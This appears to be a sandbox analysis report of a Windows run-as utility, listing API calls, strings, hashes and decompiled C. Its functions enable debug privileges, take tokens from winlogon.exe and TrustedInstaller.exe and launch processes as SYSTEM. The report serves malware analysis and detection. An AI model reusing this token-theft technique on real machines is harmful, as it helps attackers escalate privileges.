ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

DISABLETHEMES, xrefs: 004026DD
DISABLEDWM, xrefs: 004026EC
16BITCOLOR, xrefs: 004026BA
"%s" %s, xrefs: 0040263B
RunAsInvoker, xrefs: 00402677
__COMPAT_LAYER, xrefs: 00402814
HIGHDPIAWARE, xrefs: 004026FB
640X480, xrefs: 004026CE
D, xrefs: 00402374
256COLOR, xrefs: 004026AE

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

XA, xrefs: 004088E5
/cfg, xrefs: 00408727
, xrefs: 00408595
%I64x, xrefs: 004085E7
`oA, xrefs: 004088D0
/savelangfile, xrefs: 004088A3
/Run, xrefs: 0040867F
SeDebugPrivilege, xrefs: 004085B3

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

0x00401fe6
0x00401ff1
0x00401ff3
0x00401fff
0x00402002
0x004020a8
0x004020ab
0x004020f3
0x004020f6
0x00402162
0x00402165
0x004021f2
0x004021f5
0x00402235
0x00402238
0x004022be
0x0040223a
0x0040223a
0x00402240
0x0040224b
0x0040224e
0x00402251
0x00402254
0x00402259
0x0040225e
0x00402262
0x00402264
0x00402264
0x00402264
0x00402262
0x00402266
0x0040226c
0x00402271
0x00402274
0x00402276
0x0040229a
0x0040229a
0x00402278
0x00402296
0x00402296
0x0040229c
0x0040229c
0x004022c0
0x004022c2
0x004022c8
0x004022c8
0x004022c8
0x00000000
0x004022c0
0x00402201
0x00402203
0x00000000
0x00000000
0x00402220
0x00402225
0x00402227
0x00000000
0x00000000
0x0040222d
0x00000000
0x0040222d
0x00402173
0x00402179
0x0040217b
0x0040217e
0x00402183
0x00402185
0x00402188
0x0040218d
0x0040218f
0x00402192
0x004021a2
0x004021a7
0x004021a9
0x004021ac
0x004021cc
0x004021d1
0x004021d3
0x004021db
0x004021db
0x004021e1
0x004021e1
0x004021e7
0x004021e7
0x00000000
0x00402192
0x004020fe
0x00402103
0x00402105
0x00000000
0x00000000
0x00402111
0x00402114
0x00000000
0x00402114
0x004020ad
0x004020b4
0x004020b9
0x004020bc
0x00000000
0x004020c2
0x004020c4
0x004020ce
0x004020d0
0x004020d3
0x004020d4
0x004020d5
0x004020e6
0x004020e7
0x004020d7
0x004020d7
0x004020dd
0x004020de
0x004020df
0x004020df
0x004020ec
0x004020ef
0x00000000
0x004020ef
0x00402008
0x00402016
0x0040201d
0x0040202e
0x00402035
0x00402044
0x00402049
0x00402055
0x00402064
0x00402068
0x0040206e
0x0040208b
0x00402070
0x00402082
0x00402088
0x0040209e
0x004020a1
0x00402119
0x00402119
0x0040211b
0x0040211e
0x0040211e
0x00402149
0x00402151
0x00402151
0x00402157
0x00402157
0x004022cb
0x004022d2
0x004022d2

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

TrustedInstaller.exe, xrefs: 0040219C
winlogon.exe, xrefs: 00402049, 00402076
ServicesActive, xrefs: 0040216D

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

GetModuleFileNameExW, xrefs: 0040994F
EnumProcessModules, xrefs: 00409943
GetModuleBaseNameW, xrefs: 00409937
psapi.dll, xrefs: 00409927
EnumProcesses, xrefs: 0040995B
GetModuleInformation, xrefs: 00409967

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

0x00401f04
0x00401f20
0x00401f27
